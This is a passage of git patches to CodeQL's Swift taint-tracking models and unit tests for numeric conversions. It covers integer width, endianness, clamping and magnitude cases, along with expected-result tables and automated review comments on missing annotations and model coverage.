conversions.swift:63:12:63:12 | v2 | conversions.swift:62:30:62:49 | call to sourceInt(_:) | conversions.swift:63:12:63:12 | v2 | result | +| conversions.swift:66:12:66:12 | v4 | conversions.swift:65:31:65:50 | call to sourceInt(_:) | conversions.swift:66:12:66:12 | v4 | result | +| conversions.swift:75:12:75:12 | v7 | conversions.swift:74:15:74:34 | call to sourceInt(_:) | conversions.swift:75:12:75:12 | v7 | result | +| conversions.swift:90:12:90:51 | ...! | conversions.swift:90:16:90:38 | call to sourceString(_:) | conversions.swift:90:12:90:51 | ...! | result | +| conversions.swift:91:12:91:54 | ...! | conversions.swift:91:19:91:41 | call to sourceString(_:) | conversions.swift:91:12:91:54 | ...! 
| result | +| conversions.swift:93:12:93:50 | call to Self.init(littleEndian:) | conversions.swift:93:30:93:49 | call to sourceInt(_:) | conversions.swift:93:12:93:50 | call to Self.init(littleEndian:) | result | +| conversions.swift:94:12:94:56 | call to Self.init(littleEndian:) | conversions.swift:94:33:94:55 | call to sourceUInt64(_:) | conversions.swift:94:12:94:56 | call to Self.init(littleEndian:) | result | +| conversions.swift:95:12:95:47 | call to Self.init(bigEndian:) | conversions.swift:95:27:95:46 | call to sourceInt(_:) | conversions.swift:95:12:95:47 | call to Self.init(bigEndian:) | result | +| conversions.swift:96:12:96:53 | call to Self.init(bigEndian:) | conversions.swift:96:30:96:52 | call to sourceUInt64(_:) | conversions.swift:96:12:96:53 | call to Self.init(bigEndian:) | result | +| conversions.swift:97:12:97:33 | .littleEndian | conversions.swift:97:12:97:31 | call to sourceInt(_:) | conversions.swift:97:12:97:33 | .littleEndian | result | +| conversions.swift:98:12:98:36 | .littleEndian | conversions.swift:98:12:98:34 | call to sourceUInt64(_:) | conversions.swift:98:12:98:36 | .littleEndian | result | +| conversions.swift:99:12:99:33 | .bigEndian | conversions.swift:99:12:99:31 | call to sourceInt(_:) | conversions.swift:99:12:99:33 | .bigEndian | result | +| conversions.swift:100:12:100:36 | .bigEndian | conversions.swift:100:12:100:34 | call to sourceUInt64(_:) | conversions.swift:100:12:100:36 | .bigEndian | result | +| conversions.swift:136:12:136:33 | call to sourceFloat(_:) | conversions.swift:136:12:136:33 | call to sourceFloat(_:) | conversions.swift:136:12:136:33 | call to sourceFloat(_:) | result | +| conversions.swift:137:12:137:40 | call to Float.init(_:) | conversions.swift:137:18:137:39 | call to sourceFloat(_:) | conversions.swift:137:12:137:40 | call to Float.init(_:) | result | +| conversions.swift:139:12:139:41 | call to String.init(_:) | conversions.swift:139:19:139:40 | call to sourceFloat(_:) | 
conversions.swift:139:12:139:41 | call to String.init(_:) | result | +| conversions.swift:140:12:140:43 | .utf8 | conversions.swift:140:19:140:40 | call to sourceFloat(_:) | conversions.swift:140:12:140:43 | .utf8 | result | +| conversions.swift:141:12:141:43 | call to String.init(_:) | conversions.swift:141:19:141:42 | call to sourceFloat80(_:) | conversions.swift:141:12:141:43 | call to String.init(_:) | result | +| conversions.swift:142:12:142:45 | .utf8 | conversions.swift:142:19:142:42 | call to sourceFloat80(_:) | conversions.swift:142:12:142:45 | .utf8 | result | +| conversions.swift:143:12:143:42 | call to String.init(_:) | conversions.swift:143:19:143:41 | call to sourceDouble(_:) | conversions.swift:143:12:143:42 | call to String.init(_:) | result | +| conversions.swift:144:12:144:44 | .utf8 | conversions.swift:144:19:144:41 | call to sourceDouble(_:) | conversions.swift:144:12:144:44 | .utf8 | result | +| conversions.swift:146:12:146:40 | call to Float.init(_:) | conversions.swift:146:18:146:39 | call to sourceFloat(_:) | conversions.swift:146:12:146:40 | call to Float.init(_:) | result | +| conversions.swift:147:12:147:79 | call to Float.init(sign:exponent:significand:) | conversions.swift:147:41:147:60 | call to sourceInt(_:) | conversions.swift:147:12:147:79 | call to Float.init(sign:exponent:significand:) | result | +| conversions.swift:148:12:148:79 | call to Float.init(sign:exponent:significand:) | conversions.swift:148:57:148:78 | call to sourceFloat(_:) | conversions.swift:148:12:148:79 | call to Float.init(sign:exponent:significand:) | result | +| conversions.swift:150:12:150:66 | call to Float.init(signOf:magnitudeOf:) | conversions.swift:150:44:150:65 | call to sourceFloat(_:) | conversions.swift:150:12:150:66 | call to Float.init(signOf:magnitudeOf:) | result | +| conversions.swift:152:12:152:35 | .exponent | conversions.swift:152:12:152:33 | call to sourceFloat(_:) | conversions.swift:152:12:152:35 | .exponent | result | +| 
conversions.swift:153:12:153:35 | .significand | conversions.swift:153:12:153:33 | call to sourceFloat(_:) | conversions.swift:153:12:153:35 | .significand | result | +| conversions.swift:154:12:154:37 | .exponent | conversions.swift:154:12:154:35 | call to sourceFloat80(_:) | conversions.swift:154:12:154:37 | .exponent | result | +| conversions.swift:155:12:155:37 | .significand | conversions.swift:155:12:155:35 | call to sourceFloat80(_:) | conversions.swift:155:12:155:37 | .significand | result | +| conversions.swift:156:12:156:36 | .exponent | conversions.swift:156:12:156:34 | call to sourceDouble(_:) | conversions.swift:156:12:156:36 | .exponent | result | +| conversions.swift:157:12:157:36 | .significand | conversions.swift:157:12:157:34 | call to sourceDouble(_:) | conversions.swift:157:12:157:36 | .significand | result | +| conversions.swift:165:12:165:35 | call to sourceString(_:) | conversions.swift:165:12:165:35 | call to sourceString(_:) | conversions.swift:165:12:165:35 | call to sourceString(_:) | result | +| conversions.swift:166:12:166:43 | call to String.init(_:) | conversions.swift:166:19:166:42 | call to sourceString(_:) | conversions.swift:166:12:166:43 | call to String.init(_:) | result | +| conversions.swift:175:12:175:12 | ms2 | conversions.swift:174:21:174:44 | call to sourceString(_:) | conversions.swift:175:12:175:12 | ms2 | result | +| conversions.swift:176:12:176:16 | .description | conversions.swift:174:21:174:44 | call to sourceString(_:) | conversions.swift:176:12:176:16 | .description | result | +| conversions.swift:177:12:177:16 | .debugDescription | conversions.swift:174:21:174:44 | call to sourceString(_:) | conversions.swift:177:12:177:16 | .debugDescription | result | +| conversions.swift:183:12:183:12 | parent | conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:183:12:183:12 | parent | result | +| conversions.swift:184:12:184:12 | parent | conversions.swift:182:31:182:54 | call to sourceString(_:) | 
conversions.swift:184:12:184:12 | parent | result | +| conversions.swift:187:12:187:12 | v3 | conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:187:12:187:12 | v3 | result | +| conversions.swift:188:12:188:12 | v3 | conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:188:12:188:12 | v3 | result | +| conversions.swift:203:13:203:13 | arr1 | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:203:13:203:13 | arr1 | result | +| conversions.swift:204:13:204:13 | arr2 | conversions.swift:202:15:202:32 | call to sourceInt(_:) | conversions.swift:204:13:204:13 | arr2 | result | +| conversions.swift:205:13:205:19 | ...[...] | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:205:13:205:19 | ...[...] | result | +| conversions.swift:206:13:206:19 | ...[...] | conversions.swift:202:15:202:32 | call to sourceInt(_:) | conversions.swift:206:13:206:19 | ...[...] | result | +| conversions.swift:210:13:210:13 | arr1b | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:210:13:210:13 | arr1b | result | +| conversions.swift:211:13:211:13 | arr2b | conversions.swift:202:15:202:32 | call to sourceInt(_:) | conversions.swift:211:13:211:13 | arr2b | result | +| conversions.swift:212:13:212:20 | ...[...] | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:212:13:212:20 | ...[...] | result | +| conversions.swift:213:13:213:20 | ...[...] | conversions.swift:202:15:202:32 | call to sourceInt(_:) | conversions.swift:213:13:213:20 | ...[...] | result | +| conversions.swift:217:13:217:13 | arr1c | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:217:13:217:13 | arr1c | result | +| conversions.swift:218:13:218:13 | arr2c | conversions.swift:202:15:202:32 | call to sourceInt(_:) | conversions.swift:218:13:218:13 | arr2c | result | +| conversions.swift:219:13:219:20 | ...[...] 
| conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:219:13:219:20 | ...[...] | result | +| conversions.swift:220:13:220:20 | ...[...] | conversions.swift:202:15:202:32 | call to sourceInt(_:) | conversions.swift:220:13:220:20 | ...[...] | result | +| conversions.swift:236:13:236:13 | withUInt | conversions.swift:262:26:262:43 | call to sourceUInt(_:) | conversions.swift:236:13:236:13 | withUInt | result | +| conversions.swift:242:13:242:25 | .v | conversions.swift:265:37:265:53 | call to sourceInt(_:) | conversions.swift:242:13:242:25 | .v | result | +| conversions.swift:248:13:248:26 | .v | conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:248:13:248:26 | .v | result | +| conversions.swift:251:12:251:12 | self | conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:251:12:251:12 | self | result | +| conversions.swift:255:13:255:25 | .v | conversions.swift:271:43:271:59 | call to sourceInt(_:) | conversions.swift:255:13:255:25 | .v | result | +| conversions.swift:268:12:268:56 | call to Int.init(withMyValue2:) | conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:268:12:268:56 | call to Int.init(withMyValue2:) | result | +| conversions.swift:271:12:271:61 | call to mkInt(withMyValue:) | conversions.swift:271:43:271:59 | call to sourceInt(_:) | conversions.swift:271:12:271:61 | call to mkInt(withMyValue:) | result | | simple.swift:12:13:12:24 | ... .+(_:_:) ... | simple.swift:12:17:12:24 | call to source() | simple.swift:12:13:12:24 | ... .+(_:_:) ... | result | | simple.swift:13:13:13:24 | ... .+(_:_:) ... | simple.swift:13:13:13:20 | call to source() | simple.swift:13:13:13:24 | ... .+(_:_:) ... | result | | simple.swift:14:13:14:24 | ... .-(_:_:) ... | simple.swift:14:17:14:24 | call to source() | simple.swift:14:13:14:24 | ... .-(_:_:) ... | result | 
diff --git a/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected index 0e6a9b75bcb..0be7309f857 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected 
@@ -1,17 +1,30 @@ testFailures | conversions.swift:33:39:34:1 | // $ tainted=conv1-2\n | Missing result: tainted=conv1-2 | -| conversions.swift:34:41:35:1 | // $ tainted=conv1-3\n | Missing result: tainted=conv1-3 | -| conversions.swift:58:16:59:1 | // $ tainted=conv3-4\n | Missing result: tainted=conv3-4 | -| conversions.swift:61:16:62:1 | // $ tainted=conv3-5\n | Missing result: tainted=conv3-5 | -| conversions.swift:69:51:70:1 | // $ tainted=conv3-7\n | Missing result: tainted=conv3-7 | -| conversions.swift:71:49:72:1 | // $ tainted=conv4-1\n | Missing result: tainted=conv4-1 | -| conversions.swift:72:52:73:1 | // $ tainted=conv4-2\n | Missing result: tainted=conv4-2 | -| conversions.swift:73:49:74:1 | // $ tainted=conv4-3\n | Missing result: tainted=conv4-3 | -| conversions.swift:74:59:75:1 | // $ tainted=conv4-4\n | Missing result: tainted=conv4-4 | -| conversions.swift:110:43:111:1 | // $ tainted=conv7-3\n | Missing result: tainted=conv7-3 | -| conversions.swift:130:47:131:1 | // $ tainted=conv9-7\n | Missing result: tainted=conv9-7 | -| conversions.swift:131:49:132:1 | // $ tainted=conv9-8\n | Missing result: tainted=conv9-8 | -| conversions.swift:166:45:167:1 | // $ tainted=cenum\n | Missing result: tainted=cenum | -| conversions.swift:208:18:209:1 | // $ tainted=ext1\n | Missing result: tainted=ext1 | -| conversions.swift:232:47:233:1 | // $ tainted=ext1\n | Missing result: tainted=ext1 | +| conversions.swift:34:40:35:1 | // $ tainted=conv1-3\n | Missing result: tainted=conv1-3 | +| conversions.swift:35:41:36:1 | // $ tainted=conv1-4\n | Missing result: tainted=conv1-4 | +| conversions.swift:36:41:37:1 | // $ tainted=conv1-5\n | Missing result: tainted=conv1-5 | +| conversions.swift:37:41:38:1 | // $ tainted=conv1-6\n | Missing result: tainted=conv1-6 | +| conversions.swift:39:40:40:1 | // $ tainted=conv1-8\n | Missing result: tainted=conv1-8 | +| conversions.swift:40:41:41:1 | // $ tainted=conv1-9\n | Missing result: tainted=conv1-9 | +| 
conversions.swift:41:43:42:1 | // $ tainted=conv1-10\n | Missing result: tainted=conv1-10 | +| conversions.swift:42:43:43:1 | // $ tainted=conv1-11\n | Missing result: tainted=conv1-11 | +| conversions.swift:43:43:44:1 | // $ tainted=conv1-12\n | Missing result: tainted=conv1-12 | +| conversions.swift:69:16:70:1 | // $ tainted=conv3-4\n | Missing result: tainted=conv3-4 | +| conversions.swift:72:16:73:1 | // $ tainted=conv3-5\n | Missing result: tainted=conv3-5 | +| conversions.swift:80:51:81:1 | // $ tainted=conv3-7\n | Missing result: tainted=conv3-7 | +| conversions.swift:82:54:83:1 | // $ tainted=conv3-8\n | Missing result: tainted=conv3-8 | +| conversions.swift:84:49:85:1 | // $ tainted=conv4-1\n | Missing result: tainted=conv4-1 | +| conversions.swift:85:52:86:1 | // $ tainted=conv4-2\n | Missing result: tainted=conv4-2 | +| conversions.swift:86:49:87:1 | // $ tainted=conv4-3\n | Missing result: tainted=conv4-3 | +| conversions.swift:87:52:88:1 | // $ tainted=conv4-4\n | Missing result: tainted=conv4-4 | +| conversions.swift:88:59:89:1 | // $ tainted=conv4-5\n | Missing result: tainted=conv4-5 | +| conversions.swift:89:62:90:1 | // $ tainted=conv4-6\n | Missing result: tainted=conv4-6 | +| conversions.swift:138:43:139:1 | // $ tainted=conv7-3\n | Missing result: tainted=conv7-3 | +| conversions.swift:158:47:159:1 | // $ tainted=conv9-7\n | Missing result: tainted=conv9-7 | +| conversions.swift:159:49:160:1 | // $ tainted=conv9-8\n | Missing result: tainted=conv9-8 | +| conversions.swift:160:44:161:1 | // $ tainted=conv9-9\n | Missing result: tainted=conv9-9 | +| conversions.swift:161:48:162:1 | // $ tainted=conv9-10\n | Missing result: tainted=conv9-10 | +| conversions.swift:196:45:197:1 | // $ tainted=cenum\n | Missing result: tainted=cenum | +| conversions.swift:238:18:239:1 | // $ tainted=ext1\n | Missing result: tainted=ext1 | +| conversions.swift:262:47:263:1 | // $ tainted=ext1\n | Missing result: tainted=ext1 | failures 
diff --git a/swift/ql/test/library-tests/dataflow/taint/core/conversions.swift b/swift/ql/test/library-tests/dataflow/taint/core/conversions.swift index 910ee45a526..e545c956220 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/conversions.swift +++ b/swift/ql/test/library-tests/dataflow/taint/core/conversions.swift @@ -31,10 +31,21 @@ typealias MyInt = Int func testConversions() { sink(arg: sourceInt("conv1-1")) // $ tainted=conv1-1 sink(arg: Int(sourceInt("conv1-2"))) // $ tainted=conv1-2 - sink(arg: UInt8(sourceInt("conv1-3"))) // $ tainted=conv1-3 - sink(arg: Float(sourceInt("conv1-4"))) // $ tainted=conv1-4 - sink(arg: String(sourceInt("conv1-5"))) // $ tainted=conv1-5 - sink(arg: String(sourceInt("conv1-6")).utf8) // $ tainted=conv1-6 + sink(arg: Int8(sourceInt("conv1-3"))) // $ tainted=conv1-3 + sink(arg: Int16(sourceInt("conv1-4"))) // $ tainted=conv1-4 + sink(arg: Int32(sourceInt("conv1-5"))) // $ tainted=conv1-5 + sink(arg: Int64(sourceInt("conv1-6"))) // $ tainted=conv1-6 + //sink(arg: Int128(sourceInt("conv1-7"))) --- doesn't build in test (yet) + sink(arg: UInt(sourceInt("conv1-8"))) // $ tainted=conv1-8 + sink(arg: UInt8(sourceInt("conv1-9"))) // $ tainted=conv1-9 + sink(arg: UInt16(sourceInt("conv1-10"))) // $ tainted=conv1-10 + sink(arg: UInt32(sourceInt("conv1-11"))) // $ tainted=conv1-11 + sink(arg: UInt64(sourceInt("conv1-12"))) // $ tainted=conv1-12 + //sink(arg: UInt128(sourceInt("conv1-13"))) --- doesn't build in test (yet) + sink(arg: Float(sourceInt("conv1-14"))) // $ tainted=conv1-14 + sink(arg: Double(sourceInt("conv1-15"))) // $ tainted=conv1-15 + sink(arg: String(sourceInt("conv1-16"))) // $ tainted=conv1-16 + sink(arg: String(sourceInt("conv1-17")).utf8) // $ tainted=conv1-17 let arr = [1, 2, sourceInt("conv2-1")] sink(arg: arr) // $ tainted=conv2-1 
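Review bot: The new integer-width cases on new lines 34-43 (`Int8(...)` through `UInt64(...)`, conv1-3 to conv1-12) are annotated `// $ tainted=...`, but the TaintInline.expected hunk in this same commit lists every one of them under `testFailures` as "Missing result". This file already marks known gaps with `// $ MISSING: tainted=...` (the conv6 cases), which keeps `testFailures` empty so that a real loss of taint flow through a conversion stands out; for example `sink(arg: Int8(sourceInt("conv1-3"))) // $ MISSING: tainted=conv1-3`. The same applies to conv3-8 and conv4-4 to conv4-6 in the `@@ -67,17 +78,26 @@` hunk and to conv9-9 and conv9-10 in the `@@ -129,6 +157,8 @@` hunk. The body of testConversions() continues outside this hunk.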
@@ -67,17 +78,26 @@ func testConversions() { sink(arg: v8) sink(arg: v8.advanced(by: 1)) sink(arg: v8.advanced(by: sourceInt("conv3-7"))) // $ tainted=conv3-7 + sink(arg: v8.distance(to: 1)) + sink(arg: v8.distance(to: sourceUInt64("conv3-8"))) // $ tainted=conv3-8 sink(arg: Int(exactly: sourceInt("conv4-1"))!) // $ tainted=conv4-1 sink(arg: UInt32(exactly: sourceInt("conv4-2"))!) // $ tainted=conv4-2 sink(arg: Int(clamping: sourceInt("conv4-3"))) // $ tainted=conv4-3 - sink(arg: Int(truncatingIfNeeded: sourceInt("conv4-4"))) // $ tainted=conv4-4 - sink(arg: Int(sourceString("conv4-5"), radix: 10)!) // $ tainted=conv4-5 + sink(arg: UInt32(clamping: sourceInt("conv4-4"))) // $ tainted=conv4-4 + sink(arg: Int(truncatingIfNeeded: sourceInt("conv4-5"))) // $ tainted=conv4-5 + sink(arg: UInt32(truncatingIfNeeded: sourceInt("conv4-6"))) // $ tainted=conv4-6 + sink(arg: Int(sourceString("conv4-7"), radix: 10)!) // $ tainted=conv4-7 + sink(arg: UInt32(sourceString("conv4-8"), radix: 10)!) // $ tainted=conv4-8 sink(arg: Int(littleEndian: sourceInt("conv5-1"))) // $ tainted=conv5-1 - sink(arg: Int(bigEndian: sourceInt("conv5-2"))) // $ tainted=conv5-2 - sink(arg: sourceInt("conv5-3").littleEndian) // $ tainted=conv5-3 - sink(arg: sourceInt("conv5-4").bigEndian) // $ tainted=conv5-4 + sink(arg: UInt64(littleEndian: sourceUInt64("conv5-2"))) // $ tainted=conv5-2 + sink(arg: Int(bigEndian: sourceInt("conv5-3"))) // $ tainted=conv5-3 + sink(arg: UInt64(bigEndian: sourceUInt64("conv5-4"))) // $ tainted=conv5-4 + sink(arg: sourceInt("conv5-5").littleEndian) // $ tainted=conv5-5 + sink(arg: sourceUInt64("conv5-6").littleEndian) // $ tainted=conv5-6 + sink(arg: sourceInt("conv5-7").bigEndian) // $ tainted=conv5-7 + sink(arg: sourceUInt64("conv5-8").bigEndian) // $ tainted=conv5-8 let (q1, r1) = 1000.quotientAndRemainder(dividingBy: 2) sink(arg: q1) 
@@ -91,18 +111,26 @@ func testConversions() { sink(arg: q3) // $ MISSING: tainted=conv6-2 sink(arg: r3) // $ MISSING: tainted=conv6-2 + let (q4, r4) = UInt64(1000).quotientAndRemainder(dividingBy: sourceUInt64("conv6-3")) + sink(arg: q4) // $ MISSING: tainted=conv6-3 + sink(arg: r4) // $ MISSING: tainted=conv6-3 + let pair1 = 1000.addingReportingOverflow(2) sink(arg: pair1.0) // part sink(arg: pair1.1) // overflow - let pair2 = sourceInt("conv6-3").addingReportingOverflow(2) - sink(arg: pair2.0) // $ MISSING: tainted=conv6-3 + let pair2 = sourceInt("conv6-4").addingReportingOverflow(2) + sink(arg: pair2.0) // $ MISSING: tainted=conv6-4 sink(arg: pair2.1) - let pair3 = 1000.addingReportingOverflow(sourceInt("conv6-4")) - sink(arg: pair3.0) // $ MISSING: tainted=conv6-4 + let pair3 = 1000.addingReportingOverflow(sourceInt("conv6-5")) + sink(arg: pair3.0) // $ MISSING: tainted=conv6-5 sink(arg: pair3.1) + let pair4 = UInt64(1000).addingReportingOverflow(sourceUInt64("conv6-6")) + sink(arg: pair4.0) // $ MISSING: tainted=conv6-6 + sink(arg: pair4.1) + // --- sink(arg: sourceFloat("conv7-1")) // $ tainted=conv7-1 @@ -129,6 +157,8 @@ func testConversions() { sink(arg: sourceDouble("conv9-6").significand) // $ tainted=conv9-6 sink(arg: sourceUInt("conv9-7").byteSwapped) // $ tainted=conv9-7 sink(arg: sourceUInt64("conv9-8").byteSwapped) // $ tainted=conv9-8 + sink(arg: sourceInt("conv9-9").magnitude) // $ tainted=conv9-9 + sink(arg: sourceUInt64("conv9-10").magnitude) // $ tainted=conv9-10 // --- From c2c23c872b63430471aa42240f2dcf1188c99887 Mon Sep 17 00:00:00 2001 
From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 14 Nov 2024 15:06:24 +0000 Subject: [PATCH 0700/1267] Swift: Address some modelling issues for Swift 6. --- .../frameworks/StandardLibrary/Numeric.qll | 13 +- .../dataflow/taint/core/LocalTaint.expected | 32 +++++ .../dataflow/taint/core/Taint.expected | 125 ++++++++++++++++++ .../dataflow/taint/core/TaintInline.expected | 28 ---- 4 files changed, 169 insertions(+), 29 deletions(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Numeric.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Numeric.qll index 093f51ad771..f3635b8125c 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Numeric.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Numeric.qll 
@@ -35,6 +35,17 @@ private class NumericSummaries extends SummaryModelCsv {
 ";BinaryInteger;true;formatted();;;Argument[-1];ReturnValue;taint",
 ";BinaryInteger;true;formatted(_:);;;Argument[-1];ReturnValue;taint",
 ";BinaryInteger;true;quotientAndRemainder(dividingBy:);;;Argument[-1..0];ReturnValue.TupleElement[0,1];taint",
+ ";BinaryInteger;true;advanced(by:);;;Argument[-1..0];ReturnValue;taint",
+ ";BinaryInteger;true;distance(to:);;;Argument[-1..0];ReturnValue;taint",
+ ";SignedInteger;true;init(_:);;;Argument[0];ReturnValue;taint",
+ ";SignedInteger;true;init(exactly:);;;Argument[0];ReturnValue.OptionalSome;value",
+ ";UnsignedInteger;true;init(_:);;;Argument[0];ReturnValue;taint",
+ ";UnsignedInteger;true;init(exactly:);;;Argument[0];ReturnValue.OptionalSome;value",
+ ";FixedWidthInteger;true;init(_:);;;Argument[0];ReturnValue;taint",
+ ";FixedWidthInteger;true;init(clamping:);;;Argument[0];ReturnValue;taint",
+ ";FixedWidthInteger;true;init(truncatingIfNeeded:);;;Argument[0];ReturnValue;taint",
+ ";FixedWidthInteger;true;init(bitPattern:);;;Argument[0];ReturnValue;taint", // actually implemented in Int, UInt, Double etc.
+ ";FixedWidthInteger;true;init(truncating:);;;Argument[0];ReturnValue;taint", // actually implemented in Int, UInt, Double etc.
 ";FixedWidthInteger;true;init(_:radix:);;;Argument[0];ReturnValue.OptionalSome;taint",
 ";FixedWidthInteger;true;init(littleEndian:);;;Argument[0];ReturnValue;taint",
 ";FixedWidthInteger;true;init(bigEndian:);;;Argument[0];ReturnValue;taint",
@@ -92,7 +103,7 @@ private class NumericFieldsInheritTaint extends TaintInheritingContent,
 className = "BinaryInteger" and
 fieldName = "words"
 or
- className = "Numeric" and
+ className = ["Numeric", "SignedInteger", "UnsignedInteger"] and
 fieldName = ["magnitude", "byteSwapped"]
 or
 className = "BinaryFloatingPoint" and
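Review bot: The two rows commented `// actually implemented in Int, UInt, Double etc.` are keyed on `FixedWidthInteger`, but `Double` is a floating-point type and does not conform to that protocol. `Double(bitPattern:)` and `Double(truncating:)` are therefore presumably not matched by them, unless a model outside this hunk covers them. A missing summary row is a silent false negative in every taint query that relies on this library. Either add the floating-point side, e.g. `";BinaryFloatingPoint;true;init(bitPattern:);;;Argument[0];ReturnValue;taint",` with a matching test line, or narrow the comment to the integer types the rows really cover. Separately, the `init(exactly:)` rows use `value` where the neighbouring `init(_:radix:)` row uses `taint` into `ReturnValue.OptionalSome`; a short comment that the exact conversion is treated as value-preserving would show the difference is deliberate.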
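Review bot: In the second hunk (`@@ -92,7 +103,7 @@`) the widened set `className = ["Numeric", "SignedInteger", "UnsignedInteger"]` has no comment saying why the two sub-protocols must be listed next to `Numeric`. Without one, a later cleanup could collapse the list back and silently lose the `magnitude` / `byteSwapped` taint steps. If the Swift 6 standard library is the reason, as the commit subject suggests, a line such as `// SignedInteger and UnsignedInteger are listed explicitly for the Swift 6 standard library` above the disjunct would record it. The enclosing predicate starts and ends outside the hunk, so how `className` is resolved against the declaring type is not visible here.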
diff --git a/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected b/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected index a25101527f5..f73a66fa761 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected 
@@ -17,6 +17,16 @@ | conversions.swift:25:33:25:33 | self | conversions.swift:25:33:25:33 | SSA def(self) | | conversions.swift:26:22:26:22 | SSA def(self) | conversions.swift:26:22:26:38 | self[return] | | conversions.swift:26:22:26:22 | self | conversions.swift:26:22:26:22 | SSA def(self) | +| conversions.swift:33:16:33:35 | call to sourceInt(_:) | conversions.swift:33:12:33:36 | call to Self.init(_:) | +| conversions.swift:34:17:34:36 | call to sourceInt(_:) | conversions.swift:34:12:34:37 | call to Self.init(_:) | +| conversions.swift:35:18:35:37 | call to sourceInt(_:) | conversions.swift:35:12:35:38 | call to Self.init(_:) | +| conversions.swift:36:18:36:37 | call to sourceInt(_:) | conversions.swift:36:12:36:38 | call to Self.init(_:) | +| conversions.swift:37:18:37:37 | call to sourceInt(_:) | conversions.swift:37:12:37:38 | call to Self.init(_:) | +| conversions.swift:39:17:39:36 | call to sourceInt(_:) | conversions.swift:39:12:39:37 | call to Self.init(_:) | +| conversions.swift:40:18:40:37 | call to sourceInt(_:) | conversions.swift:40:12:40:38 | call to Self.init(_:) | +| conversions.swift:41:19:41:39 | call to sourceInt(_:) | conversions.swift:41:12:41:40 | call to Self.init(_:) | +| conversions.swift:42:19:42:39 | call to sourceInt(_:) | conversions.swift:42:12:42:40 | call to Self.init(_:) | +| conversions.swift:43:19:43:39 | call to sourceInt(_:) | conversions.swift:43:12:43:40 | call to Self.init(_:) | | conversions.swift:45:18:45:38 | call to sourceInt(_:) | conversions.swift:45:12:45:39 | call to Float.init(_:) | | conversions.swift:46:19:46:39 | call to sourceInt(_:) | conversions.swift:46:12:46:40 | call to Double.init(_:) | | conversions.swift:47:19:47:39 | call to sourceInt(_:) | conversions.swift:47:12:47:40 | call to String.init(_:) | 
@@ -51,9 +61,11 @@ | conversions.swift:68:6:68:6 | SSA def(v5) | conversions.swift:69:12:69:12 | v5 | | conversions.swift:68:6:68:6 | v5 | conversions.swift:68:6:68:6 | SSA def(v5) | | conversions.swift:68:11:68:56 | call to Self.init(truncatingIfNeeded:) | conversions.swift:68:6:68:6 | v5 | +| conversions.swift:68:36:68:55 | call to sourceInt(_:) | conversions.swift:68:11:68:56 | call to Self.init(truncatingIfNeeded:) | | conversions.swift:71:6:71:6 | SSA def(v6) | conversions.swift:72:12:72:12 | v6 | | conversions.swift:71:6:71:6 | v6 | conversions.swift:71:6:71:6 | SSA def(v6) | | conversions.swift:71:11:71:48 | call to UInt.init(bitPattern:) | conversions.swift:71:6:71:6 | v6 | +| conversions.swift:71:28:71:47 | call to sourceInt(_:) | conversions.swift:71:11:71:48 | call to UInt.init(bitPattern:) | | conversions.swift:74:6:74:6 | SSA def(v7) | conversions.swift:75:12:75:12 | v7 | | conversions.swift:74:6:74:6 | v7 | conversions.swift:74:6:74:6 | SSA def(v7) | | conversions.swift:74:11:74:35 | call to abs(_:) | conversions.swift:74:6:74:6 | v7 | 
@@ -64,13 +76,25 @@ | conversions.swift:78:12:78:12 | [post] v8 | conversions.swift:79:12:79:12 | v8 | | conversions.swift:78:12:78:12 | v8 | conversions.swift:79:12:79:12 | v8 | | conversions.swift:79:12:79:12 | [post] v8 | conversions.swift:80:12:80:12 | v8 | +| conversions.swift:79:12:79:12 | v8 | conversions.swift:79:12:79:29 | call to advanced(by:) | | conversions.swift:79:12:79:12 | v8 | conversions.swift:80:12:80:12 | v8 | +| conversions.swift:79:28:79:28 | 1 | conversions.swift:79:12:79:29 | call to advanced(by:) | | conversions.swift:80:12:80:12 | [post] v8 | conversions.swift:81:12:81:12 | v8 | +| conversions.swift:80:12:80:12 | v8 | conversions.swift:80:12:80:48 | call to advanced(by:) | | conversions.swift:80:12:80:12 | v8 | conversions.swift:81:12:81:12 | v8 | +| conversions.swift:80:28:80:47 | call to sourceInt(_:) | conversions.swift:80:12:80:48 | call to advanced(by:) | | conversions.swift:81:12:81:12 | [post] v8 | conversions.swift:82:12:82:12 | v8 | +| conversions.swift:81:12:81:12 | v8 | conversions.swift:81:12:81:29 | call to distance(to:) | | conversions.swift:81:12:81:12 | v8 | conversions.swift:82:12:82:12 | v8 | +| conversions.swift:81:28:81:28 | 1 | conversions.swift:81:12:81:29 | call to distance(to:) | +| conversions.swift:82:12:82:12 | v8 | conversions.swift:82:12:82:51 | call to distance(to:) | +| conversions.swift:82:28:82:50 | call to sourceUInt64(_:) | conversions.swift:82:12:82:51 | call to distance(to:) | | conversions.swift:84:12:84:45 | call to Self.init(exactly:) | conversions.swift:84:12:84:46 | ...! | | conversions.swift:85:12:85:48 | call to Self.init(exactly:) | conversions.swift:85:12:85:49 | ...! 
